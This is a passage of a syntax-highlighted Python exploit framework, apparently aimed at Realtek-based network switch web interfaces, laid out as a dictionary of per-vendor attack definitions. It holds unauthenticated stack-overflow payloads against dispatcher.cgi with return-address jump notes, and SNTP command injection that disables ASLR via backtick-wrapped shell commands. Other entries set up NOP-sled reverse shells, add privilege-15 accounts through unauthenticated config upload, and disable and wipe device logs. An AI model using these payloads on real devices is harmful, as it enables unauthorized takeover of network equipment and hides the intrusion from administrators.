						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=0&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>	<span class="token comment"># Not vulnerable </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: del priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;LOGGING_SERVICE=0'</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>						<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;_del=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Clean RAM log CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>							<span class="token comment"># Clean RAM log SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;_del=1'</span><span class="token punctuation">,</span>		<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>							<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=+&amp;sntp_Port=139'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Realtek'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Realtek'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=USERNAME&amp;password=PASSWORD&amp;login=1'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=547'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'LOGGING_SERVICE=0&amp;cmd=5121'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+file+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+buffered+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'httpuploadbakcfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "backup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadbakcfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Image Signature Error'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'dispatcher.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">184</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;login=1'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'md5'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span> 
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=524&amp;usrName=USERNAME'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=1&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=+&amp;sntp_Port=139&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=0&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;login=1&amp;_CMD_'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

